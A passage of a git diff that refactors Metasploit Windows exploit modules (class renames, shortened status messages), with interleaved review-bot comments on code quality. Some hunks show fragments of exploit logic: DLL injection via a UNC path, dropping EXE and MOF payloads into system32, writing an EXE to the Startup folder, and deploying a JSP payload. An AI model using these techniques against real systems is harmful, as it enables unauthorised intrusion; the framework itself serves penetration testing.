overflow...") + print_status("Triggering overflow...") sock.put(http_body) disconnect diff --git a/modules/exploits/windows/misc/hp_ovtrace.rb b/modules/exploits/windows/misc/hp_ovtrace.rb index 0612f411ef..77ff5cd927 100644 --- a/modules/exploits/windows/misc/hp_ovtrace.rb +++ b/modules/exploits/windows/misc/hp_ovtrace.rb 
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/ib_isc_attach_database.rb b/modules/exploits/windows/misc/ib_isc_attach_database.rb
index 85ad7d3da3..8b90ae8b18 100644
--- a/modules/exploits/windows/misc/ib_isc_attach_database.rb
+++ b/modules/exploits/windows/misc/ib_isc_attach_database.rb
@@ -7,7 +7,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/ib_isc_create_database.rb b/modules/exploits/windows/misc/ib_isc_create_database.rb
index 794f12d3c6..19e55148ad 100644
--- a/modules/exploits/windows/misc/ib_isc_create_database.rb
+++ b/modules/exploits/windows/misc/ib_isc_create_database.rb
@@ -7,7 +7,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/ib_svc_attach.rb b/modules/exploits/windows/misc/ib_svc_attach.rb
index ce739237e8..7a177f1417 100644
--- a/modules/exploits/windows/misc/ib_svc_attach.rb
+++ b/modules/exploits/windows/misc/ib_svc_attach.rb
@@ -7,7 +7,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb
index 7d538a816f..2b8ed7bd4c 100644
--- a/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb
+++ b/modules/exploits/windows/misc/ibm_cognos_tm1admsd_bof.rb
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -38,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'SSL' => true, - 'SSLVersion' => 'TLS1' }, 'Payload' => { diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index b9be472306..965e5cc20c 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient @@ -246,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote def check peer = "#{rhost}:#{rport}" - print_status("#{peer} - Checking if CIMListener exists...") + print_status("Checking if CIMListener exists...") res = send_request_cgi({ 'uri' => "/CIMListener/", @@ -286,7 +286,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll") - print_status("#{peer} - Injecting DLL...") + print_status("Injecting DLL...") res = send_request_cgi({ 'uri' => "/CIMListener/#{exploit_unc}#{share_name}\\#{basename}.dll", @@ -302,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /CIMVERSION/ - print_status"#{peer} - Then injection seemed to work..." + print_status"Then injection seemed to work..." else fail_with(Failure::Unknown, "#{peer} - Unexpected response") end diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index cf81053e33..af43d8f24c 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb 
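Review bot: The rewritten success message in the `@@ -302,7 +302,7 @@` hunk of ibm_director_cim_dllinject.rb still reads `print_status"Then injection seemed to work..."`: "Then" looks like a typo for "The", and the call has neither a space nor parentheses before the string, unlike the other `print_status` calls in this file's hunks. Since the line is being touched anyway, I would write `print_status("The injection seemed to work...")`. The enclosing method starts outside the hunk.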
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb
index 1457cd8de1..6a5f5a1bdb 100644
--- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb
+++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/itunes_extm3u_bof.rb b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
index e101f6beda..f1f6199933 100644
--- a/modules/exploits/windows/misc/itunes_extm3u_bof.rb
+++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb
index fc6e775b23..e6aa0aa5eb 100644
--- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb
+++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Udp
diff --git a/modules/exploits/windows/misc/lianja_db_net.rb b/modules/exploits/windows/misc/lianja_db_net.rb
index 9831813bbc..b9e6600298 100644
--- a/modules/exploits/windows/misc/lianja_db_net.rb
+++ b/modules/exploits/windows/misc/lianja_db_net.rb
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::RopDb diff --git a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb index ad3de555e3..1ce06c4926 100644 --- a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb +++ b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer") + vprint_status("Trying to detect ManageEngine EventLog Analyzer") res = send_request_cgi({ 'method' => 'GET', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Retrieving JSESSION ID") + print_status("Retrieving JSESSION ID") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'event', 'index3.do'), @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/ jsessionid = $1 - print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]") + print_status("JSESSION ID Retrieved [ #{jsessionid} ]") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!") end - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"), 
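Review bot: `print_status("JSESSION ID Retrieved [ #{jsessionid} ]")` in the `@@ -122,12 +122,12 @@` hunk writes a live session identifier to normal console output, and the `@@ -158,7 +158,7 @@` hunk does the same with the full post-login cookie string in `Logged in, new cookies retrieved [#{cookies}]`. Console output is routinely spooled to files and pasted into reports, so authenticated session tokens should not appear at the default verbosity. I would move both messages to `vprint_status`, or report only that a cookie was obtained, for example `print_status("JSESSION ID retrieved")`. The `exploit` method continues outside these hunks.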
@@ -143,14 +143,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 redirect = URI(res.headers['Location']) - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET' @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/ cookies = res.get_cookies - print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]") + print_status("Logged in, new cookies retrieved [#{cookies}]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!") end @@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '') - print_status("#{peer} - Executing SQL queries") + print_status("Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}") - print_status("#{peer} - Executing JSP payload") + print_status("Executing JSP payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, jsp_name), diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index a856002418..1ca77aead5 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp 
diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb
index 19c613356f..5bfbbb284b 100644
--- a/modules/exploits/windows/misc/mini_stream.rb
+++ b/modules/exploits/windows/misc/mini_stream.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb
index c147e4ca8a..fdfaf0add6 100644
--- a/modules/exploits/windows/misc/mirc_privmsg_server.rb
+++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::TcpServer
diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb
index 8450f0562a..0d81ba82c5 100644
--- a/modules/exploits/windows/misc/ms07_064_sami.rb
+++ b/modules/exploits/windows/misc/ms07_064_sami.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::TcpServer
diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb
index 5c46c811ed..e021f4f11e 100644
--- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb
+++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpClient
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote filename = rand_text_alpha(rand(10)+5) + '.txt' contents = rand_text_alpha(rand(10)+5) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}") + print_status("Sending HTTP ConvertFile Request to upload the test file #{filename}") res = upload_file(filename, contents) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ @@ -127,21 +127,21 @@ class Metasploit3 < Msf::Exploit::Remote mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ - print_good("#{peer} - #{exe_name} uploaded successfully") + print_good("#{exe_name} uploaded successfully") else - print_error("#{peer} - Failed to upload #{exe_name}") + print_error("Failed to upload #{exe_name}") return end - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ - print_good("#{peer} - #{mof_name} uploaded successfully") + print_good("#{mof_name} uploaded successfully") else - print_error("#{peer} - Failed to upload #{mof_name}") + print_error("Failed to upload #{mof_name}") return end diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index a89f98e2de..ca13a1fbef 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb 
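Review bot: The acceptance test `res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/` is repeated verbatim three times across the `@@ -107,7 +107,7 @@` and `@@ -127,21 +127,21 @@` hunks, so any change to what counts as an accepted response has to be made in three places. A small private predicate would keep them in step, for example `def upload_ok?(res)` returning `res && res.code == 200 && res.body =~ /ConvertFileResponse/ && res.body =~ /<m_ce>CE_OTHER<\/m_ce>/`, written with `&&` rather than the low-precedence `and`. Both enclosing methods start outside the hunks.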
+++ b/modules/exploits/windows/misc/netcat110_nt.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/nettransport.rb b/modules/exploits/windows/misc/nettransport.rb
index 20139031b8..9c93950deb 100644
--- a/modules/exploits/windows/misc/nettransport.rb
+++ b/modules/exploits/windows/misc/nettransport.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/nvidia_mental_ray.rb b/modules/exploits/windows/misc/nvidia_mental_ray.rb
index 82a4b8f7a3..592f64903d 100644
--- a/modules/exploits/windows/misc/nvidia_mental_ray.rb
+++ b/modules/exploits/windows/misc/nvidia_mental_ray.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/poisonivy_bof.rb b/modules/exploits/windows/misc/poisonivy_bof.rb
index ed26b02365..92a41a9510 100644
--- a/modules/exploits/windows/misc/poisonivy_bof.rb
+++ b/modules/exploits/windows/misc/poisonivy_bof.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb
index a5637b1b3e..b00e4573e5 100644
--- a/modules/exploits/windows/misc/poppeeper_date.rb
+++ b/modules/exploits/windows/misc/poppeeper_date.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::TcpServer
diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb
index ef53ef6207..82bf4b2499 100644
--- a/modules/exploits/windows/misc/poppeeper_uidl.rb
+++ b/modules/exploits/windows/misc/poppeeper_uidl.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::TcpServer
diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb
index 9a477457b6..b1d3e0876d 100644
--- a/modules/exploits/windows/misc/realtek_playlist.rb
+++ b/modules/exploits/windows/misc/realtek_playlist.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb
index 54caf13f2d..bd359502e7 100644
--- a/modules/exploits/windows/misc/sap_2005_license.rb
+++ b/modules/exploits/windows/misc/sap_2005_license.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb
index 9641fcacc5..99c952ef24 100644
--- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb
+++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb
@@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp @@ -136,12 +136,12 @@ class Metasploit3 < Msf::Exploit::Remote pkt << diagheader pkt << user_connect pkt << support_data - print_status("#{peer} - Sending initialize packet to the SAP Dispatcher") + print_status("Sending initialize packet to the SAP Dispatcher") sock.put(pkt) res = sock.get_once(-1) if not res - print_error("#{peer} - The connection with the Dispatcher has not been initialized") + print_error("The connection with the Dispatcher has not been initialized") return end @@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote crash << payload.encoded end - print_status("#{peer} - Sending crafted message") + print_status("Sending crafted message") message = "\x10\x06\x20" + [crash.length].pack("n") + crash diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index 1b536ec7a4..35326a2771 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb index b2a11ea670..fb3049aa86 100644 --- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb +++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp 
@@ -81,13 +81,13 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once disconnect if !res - vprint_error "#{peer} - Connection failed." + vprint_error "Connection failed." Exploit::CheckCode::Unknown elsif res == "\x00\x00\x00\x00" - vprint_status "#{peer} - Received reply (#{res.length} bytes)" + vprint_status "Received reply (#{res.length} bytes)" Exploit::CheckCode::Detected else - vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)" + vprint_warning "Unexpected reply (#{res.length} bytes)" Exploit::CheckCode::Safe end end @@ -115,9 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote if !res fail_with(Failure::Unknown, "#{peer} - Connection failed.") elsif res == "\x00\x00\x00\x00" - print_status "#{peer} - Received reply (#{res.length} bytes)" + print_status "Received reply (#{res.length} bytes)" else - print_warning "#{peer} - Unexpected reply (#{res.length} bytes)" + print_warning "Unexpected reply (#{res.length} bytes)" end end 
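Review bot: In the `@@ -81,13 +81,13 @@` hunk the `else` branch returns `Exploit::CheckCode::Safe` for any reply that is not `"\x00\x00\x00\x00"`, even though the message on that branch says only `Unexpected reply`. An unrecognised response does not show that the service is patched, so anyone relying on this check for vulnerability assessment gets a false negative. `Exploit::CheckCode::Unknown`, which the `!res` branch already returns, is the honest result there. The method begins outside the hunk.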
@@ -129,15 +129,15 @@ class Metasploit3 < Msf::Exploit::Remote exe = generate_payload_exe exe_name = "#{rand_text_alpha(rand(10) + 5)}.exe" if target.name =~ /Automatic/ or target.name =~ /Vista/ - print_status("#{peer} - Writing EXE to startup for all users (#{exe.length} bytes)") + print_status("Writing EXE to startup for all users (#{exe.length} bytes)") upload("#{depth}\\Users\\All Users\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\#{exe_name}", exe) end if target.name =~ /Automatic/ or target.name =~ /XP/ - print_status("#{peer} - Sending EXE (#{exe.length} bytes)") + print_status("Sending EXE (#{exe.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\#{exe_name}", exe) mof_name = "#{rand_text_alpha(rand(10) + 5)}.mof" mof = generate_mof(::File.basename(mof_name), ::File.basename(exe_name)) - print_status("#{peer} - Sending MOF (#{mof.length} bytes)") + print_status("Sending MOF (#{mof.length} bytes)") upload("#{depth}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{::File.basename(mof_name)}") end diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb index 988b83a081..42ab69a938 100644 --- a/modules/exploits/windows/misc/splayer_content_type.rb +++ b/modules/exploits/windows/misc/splayer_content_type.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/misc/stream_down_bof.rb b/modules/exploits/windows/misc/stream_down_bof.rb index 1d1237953b..6975c8e264 100644 --- a/modules/exploits/windows/misc/stream_down_bof.rb +++ b/modules/exploits/windows/misc/stream_down_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer 
diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb
index 4b867975e7..34f7cbf704 100644
--- a/modules/exploits/windows/misc/talkative_response.rb
+++ b/modules/exploits/windows/misc/talkative_response.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = NormalRanking
 include Msf::Exploit::Remote::TcpServer
diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb
index cf947bc553..a12b6c76f8 100644
--- a/modules/exploits/windows/misc/tiny_identd_overflow.rb
+++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb
index a7c7d48bfa..602dcce773 100644
--- a/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb
+++ b/modules/exploits/windows/misc/trendmicro_cmdprocessor_addtask.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/ufo_ai.rb b/modules/exploits/windows/misc/ufo_ai.rb
index de6bdafa9a..fbfeab6bd0 100644
--- a/modules/exploits/windows/misc/ufo_ai.rb
+++ b/modules/exploits/windows/misc/ufo_ai.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::TcpServer
diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb
index d6acee9bb0..8db7d2160c 100644
--- a/modules/exploits/windows/misc/windows_rsh.rb
+++ b/modules/exploits/windows/misc/windows_rsh.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = AverageRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/misc/wireshark_lua.rb b/modules/exploits/windows/misc/wireshark_lua.rb
index 34fe258f61..2038a67811 100644
--- a/modules/exploits/windows/misc/wireshark_lua.rb
+++ b/modules/exploits/windows/misc/wireshark_lua.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::HttpServer::HTML
diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb
index 18d24e0ecc..4ac2312823 100644
--- a/modules/exploits/windows/misc/wireshark_packet_dect.rb
+++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GoodRanking
 include Msf::Exploit::Remote::Capture
diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
index c20731b6f7..702c4c0e37 100644
--- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
+++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb
@@ -3,7 +3,7 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = GreatRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb
index 178db155a1..8b7959b40c 100644
--- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb
+++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::Tcp
diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb
index a4bb8bffe2..f16938f734 100644
--- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb
+++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb
@@ -5,7 +5,7 @@
 require 'msf/core'
-class Metasploit3 < Msf::Exploit::Remote
+class MetasploitModule < Msf::Exploit::Remote
 Rank = ExcellentRanking
 include Msf::Exploit::Remote::MSSQL
diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb
index bebd9c7c2d..cf6ca68dcc 100644
--- a/modules/exploits/windows/mssql/ms02_039_slammer.rb
+++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb
